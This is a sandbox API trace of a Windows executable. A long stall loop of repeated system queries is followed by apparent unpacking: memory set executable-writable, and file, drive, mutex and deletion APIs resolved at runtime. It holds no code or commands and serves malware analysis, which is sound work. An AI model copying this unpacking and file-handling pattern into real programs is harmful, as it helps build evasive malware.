	[0130.141] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0130.141] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0130.141] GetMessageExtraInfo () returned 0x0
	[0130.142] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0130.142] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0130.142] GetMessageExtraInfo () returned 0x0
	[0130.142] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0130.142] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0130.142] GetMessageExtraInfo () returned 0x0
	[0130.143] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0130.143] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0130.143] GetMessageExtraInfo () returned 0x0
	[0130.144] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0130.144] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0130.144] GetMessageExtraInfo () returned 0x0
	[0130.144] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0130.144] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0130.145] GetMessageExtraInfo () returned 0x0
	[0130.145] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0130.145] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0130.145] GetMessageExtraInfo () returned 0x0
	[0130.146] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0130.146] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0130.146] GetMessageExtraInfo () returned 0x0
	[0130.147] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0130.147] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0130.147] GetMessageExtraInfo () returned 0x0
	[0130.148] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0130.148] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0130.148] GetMessageExtraInfo () returned 0x0
	[0130.148] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0130.148] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0130.148] GetMessageExtraInfo () returned 0x0
	[0130.149] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0130.149] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0130.149] GetMessageExtraInfo () returned 0x0
	[0130.150] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0130.150] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0130.150] GetMessageExtraInfo () returned 0x0
	[0130.150] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0130.151] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0130.151] GetMessageExtraInfo () returned 0x0
	[0130.152] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0130.152] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0130.152] GetMessageExtraInfo () returned 0x0
	[0130.152] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0130.152] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0130.152] GetMessageExtraInfo () returned 0x0
	[0130.153] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0130.153] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0130.153] GetMessageExtraInfo () returned 0x0
	[0130.154] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0130.154] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0130.154] GetMessageExtraInfo () returned 0x0
	[0130.154] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0130.154] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0130.154] GetMessageExtraInfo () returned 0x0
	[0130.155] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0130.156] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0130.156] GetMessageExtraInfo () returned 0x0
	[0130.156] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0130.156] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0130.156] GetMessageExtraInfo () returned 0x0
	[0130.157] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0130.157] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0130.157] GetMessageExtraInfo () returned 0x0
	[0130.158] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0130.158] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0130.158] GetMessageExtraInfo () returned 0x0
	[0130.159] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0130.159] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0130.159] GetMessageExtraInfo () returned 0x0
	[0130.160] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0130.161] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0130.161] GetMessageExtraInfo () returned 0x0
	[0130.175] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0130.175] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0130.175] GetMessageExtraInfo () returned 0x0
	[0130.187] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0130.187] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0130.187] GetMessageExtraInfo () returned 0x0
	[0130.188] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0130.188] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0130.188] GetMessageExtraInfo () returned 0x0
	[0130.189] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0130.189] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0130.189] GetMessageExtraInfo () returned 0x0
	[0130.190] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0130.190] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0130.190] GetMessageExtraInfo () returned 0x0
	[0130.208] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0130.208] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0130.208] GetMessageExtraInfo () returned 0x0
	[0130.208] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0130.208] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0130.208] GetMessageExtraInfo () returned 0x0
	[0130.208] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0130.208] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0130.208] GetMessageExtraInfo () returned 0x0
	[0130.208] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0130.208] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0130.208] GetMessageExtraInfo () returned 0x0
	[0130.208] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0130.208] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0130.208] GetMessageExtraInfo () returned 0x0
	[0130.208] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0130.208] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0130.208] GetMessageExtraInfo () returned 0x0
	[0130.208] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0130.208] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0130.208] GetMessageExtraInfo () returned 0x0
	[0130.208] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0130.208] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0130.208] GetMessageExtraInfo () returned 0x0
	[0130.208] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0130.208] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0130.209] GetMessageExtraInfo () returned 0x0
	[0130.209] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0130.209] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0130.209] GetMessageExtraInfo () returned 0x0
	[0130.209] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0130.209] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0130.209] GetMessageExtraInfo () returned 0x0
	[0130.209] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0130.209] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0130.209] GetMessageExtraInfo () returned 0x0
	[0130.209] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0130.209] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0130.209] GetMessageExtraInfo () returned 0x0
	[0130.209] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0130.209] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0130.209] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0130.209] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0130.209] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0130.209] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0130.209] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0130.209] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0136.365] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x77080000
	[0136.365] GetProcAddress (hModule=0x77080000, lpProcName="GlobalAlloc") returned 0x7709588e
	[0136.446] GetProcAddress (hModule=0x77080000, lpProcName="VirtualProtect") returned 0x7709435f
	[0136.446] VirtualProtect (in: lpAddress=0x7a06948, dwSize=0x120fc, flNewProtect=0x40, lpflOldProtect=0x18edbc | out: lpflOldProtect=0x18edbc*=0x4) returned 1
	[0136.454] LoadLibraryA (lpLibFileName="kernel32.dll") returned 0x77080000
	[0136.455] GetProcAddress (hModule=0x77080000, lpProcName="GlobalAlloc") returned 0x7709588e
	[0136.455] GetProcAddress (hModule=0x77080000, lpProcName="GetLastError") returned 0x770911c0
	[0136.455] GetProcAddress (hModule=0x77080000, lpProcName="Sleep") returned 0x770910ff
	[0136.455] GetProcAddress (hModule=0x77080000, lpProcName="VirtualAlloc") returned 0x77091856
	[0136.455] GetProcAddress (hModule=0x77080000, lpProcName="CreateToolhelp32Snapshot") returned 0x770b735f
	[0136.455] GetProcAddress (hModule=0x77080000, lpProcName="Module32First") returned 0x77115cd9
	[0136.455] GetProcAddress (hModule=0x77080000, lpProcName="CloseHandle") returned 0x77091410
	[0136.455] CreateToolhelp32Snapshot (dwFlags=0x8, th32ProcessID=0x0) returned 0x58
	[0136.457] Module32First (hSnapshot=0x58, lpme=0x18fb70) returned 1
	[0136.458] VirtualAlloc (lpAddress=0x0, dwSize=0x18050, flAllocationType=0x1000, flProtect=0x40) returned 0x210000
	[0136.460] GetProcAddress (hModule=0x77080000, lpProcName="LoadLibraryA") returned 0x770949d7
	[0136.460] LoadLibraryA (lpLibFileName="kernel32.dll") returned 0x77080000
	[0136.460] GetProcAddress (hModule=0x77080000, lpProcName="VirtualAlloc") returned 0x77091856
	[0136.461] GetProcAddress (hModule=0x77080000, lpProcName="VirtualProtect") returned 0x7709435f
	[0136.461] GetProcAddress (hModule=0x77080000, lpProcName="VirtualFree") returned 0x7709186e
	[0136.461] GetProcAddress (hModule=0x77080000, lpProcName="GetVersionExA") returned 0x77093519
	[0136.461] GetProcAddress (hModule=0x77080000, lpProcName="TerminateProcess") returned 0x770ad802
	[0136.461] GetProcAddress (hModule=0x77080000, lpProcName="ExitProcess") returned 0x77097a10
	[0136.461] GetProcAddress (hModule=0x77080000, lpProcName="SetErrorMode") returned 0x77091b00
	[0136.461] SetErrorMode (uMode=0x400) returned 0x0
	[0136.461] SetErrorMode (uMode=0x0) returned 0x400
	[0136.461] GetVersionExA (in: lpVersionInformation=0x18eaa0*(dwOSVersionInfoSize=0x94, dwMajorVersion=0x65006564, dwMinorVersion=0x7373, dwBuildNumber=0x2, dwPlatformId=0xffffffff, szCSDVersion="s}\\w") | out: lpVersionInformation=0x18eaa0*(dwOSVersionInfoSize=0x94, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
	[0136.461] VirtualAlloc (lpAddress=0x0, dwSize=0x17200, flAllocationType=0x1000, flProtect=0x4) returned 0x230000
	[0136.463] VirtualProtect (in: lpAddress=0x400000, dwSize=0x19000, flNewProtect=0x40, lpflOldProtect=0x18fb28 | out: lpflOldProtect=0x18fb28*=0x2) returned 1
	[0136.530] VirtualFree (lpAddress=0x230000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0136.530] LoadLibraryA (lpLibFileName="KERNEL32.dll") returned 0x77080000
	[0136.530] GetProcAddress (hModule=0x77080000, lpProcName="GetProcAddress") returned 0x77091222
	[0136.530] GetProcAddress (hModule=0x77080000, lpProcName="LoadLibraryA") returned 0x770949d7
	[0136.530] GetProcAddress (hModule=0x77080000, lpProcName="WaitForSingleObject") returned 0x77091136
	[0136.530] GetProcAddress (hModule=0x77080000, lpProcName="InitializeCriticalSectionAndSpinCount") returned 0x77091916
	[0136.530] GetProcAddress (hModule=0x77080000, lpProcName="LeaveCriticalSection") returned 0x775b2270
	[0136.530] GetProcAddress (hModule=0x77080000, lpProcName="GetLastError") returned 0x770911c0
	[0136.531] GetProcAddress (hModule=0x77080000, lpProcName="EnterCriticalSection") returned 0x775b22b0
	[0136.531] GetProcAddress (hModule=0x77080000, lpProcName="ReleaseMutex") returned 0x7709111e
	[0136.531] GetProcAddress (hModule=0x77080000, lpProcName="CloseHandle") returned 0x77091410
	[0136.531] LoadLibraryA (lpLibFileName="msvcr100.dll") returned 0x74f20000
	[0136.587] GetProcAddress (hModule=0x74f20000, lpProcName="atexit") returned 0x74f3c544
	[0136.588] atexit (param_1=0x210920) returned 0
	[0136.588] LoadLibraryA (lpLibFileName="kernel32.dll") returned 0x77080000
	[0136.588] GetProcAddress (hModule=0x77080000, lpProcName="GetProcAddress") returned 0x77091222
	[0136.589] GetProcAddress (hModule=0x77080000, lpProcName="GetModuleHandleW") returned 0x770934b0
	[0136.589] GetProcAddress (hModule=0x77080000, lpProcName="FindNextFileW") returned 0x770954ee
	[0136.589] GetProcAddress (hModule=0x77080000, lpProcName="FindClose") returned 0x77094442
	[0136.589] GetProcAddress (hModule=0x77080000, lpProcName="MoveFileW") returned 0x770a9af0
	[0136.589] GetProcAddress (hModule=0x77080000, lpProcName="GetFileSizeEx") returned 0x770959e2
	[0136.589] GetProcAddress (hModule=0x77080000, lpProcName="GetModuleFileNameW") returned 0x77094950
	[0136.589] GetProcAddress (hModule=0x77080000, lpProcName="GetFileAttributesW") returned 0x77091b18
	[0136.589] GetProcAddress (hModule=0x77080000, lpProcName="ExitProcess") returned 0x77097a10
	[0136.589] GetProcAddress (hModule=0x77080000, lpProcName="GetCommandLineW") returned 0x77095223
	[0136.589] GetProcAddress (hModule=0x77080000, lpProcName="GetComputerNameW") returned 0x7709dd0e
	[0136.589] GetProcAddress (hModule=0x77080000, lpProcName="GetComputerNameA") returned 0x770ab6e0
	[0136.589] GetProcAddress (hModule=0x77080000, lpProcName="CreateMutexW") returned 0x7709424c
	[0136.589] GetProcAddress (hModule=0x77080000, lpProcName="lstrlenW") returned 0x77091700
	[0136.589] GetProcAddress (hModule=0x77080000, lpProcName="lstrlenA") returned 0x77095a4b
	[0136.589] GetProcAddress (hModule=0x77080000, lpProcName="GetCurrentProcess") returned 0x77091809
	[0136.590] GetProcAddress (hModule=0x77080000, lpProcName="WaitForSingleObject") returned 0x77091136
	[0136.590] GetProcAddress (hModule=0x77080000, lpProcName="GetLogicalDrives") returned 0x77095371
	[0136.590] GetProcAddress (hModule=0x77080000, lpProcName="GetTickCount") returned 0x7709110c
	[0136.590] GetProcAddress (hModule=0x77080000, lpProcName="DeleteFileW") returned 0x770989b3
	[0136.590] GetProcAddress (hModule=0x77080000, lpProcName="WideCharToMultiByte") returned 0x7709170d
	[0136.590] GetProcAddress (hModule=0x77080000, lpProcName="InitializeCriticalSectionAndSpinCount") returned 0x77091916
	[0136.590] GetProcAddress (hModule=0x77080000, lpProcName="Sleep") returned 0x770910ff
	[0136.590] GetProcAddress (hModule=0x77080000, lpProcName="LeaveCriticalSection") returned 0x775b2270
	[0136.590] GetProcAddress (hModule=0x77080000, lpProcName="ReadFile") returned 0x77093ed3
	[0136.590] GetProcAddress (hModule=0x77080000, lpProcName="CreateFileW") returned 0x77093f5c
	[0136.590] GetProcAddress (hModule=0x77080000, lpProcName="OpenMutexW") returned 0x77095151
	[0136.590] GetProcAddress (hModule=0x77080000, lpProcName="EnterCriticalSection") returned 0x775b22b0
	[0136.590] GetProcAddress (hModule=0x77080000, lpProcName="WaitForMultipleObjects") returned 0x77094220
	[0136.590] GetProcAddress (hModule=0x77080000, lpProcName="lstrcmpiW") returned 0x770ad5cd
	[0136.590] GetProcAddress (hModule=0x77080000, lpProcName="lstrcmpiA") returned 0x77093e8e
	[0136.590] GetProcAddress (hModule=0x77080000, lpProcName="DeleteCriticalSection") returned 0x775c45f5
	[0136.591] GetProcAddress (hModule=0x77080000, lpProcName="ReleaseMutex") returned 0x7709111e
	[0136.591] GetProcAddress (hModule=0x77080000, lpProcName="CloseHandle") returned 0x77091410
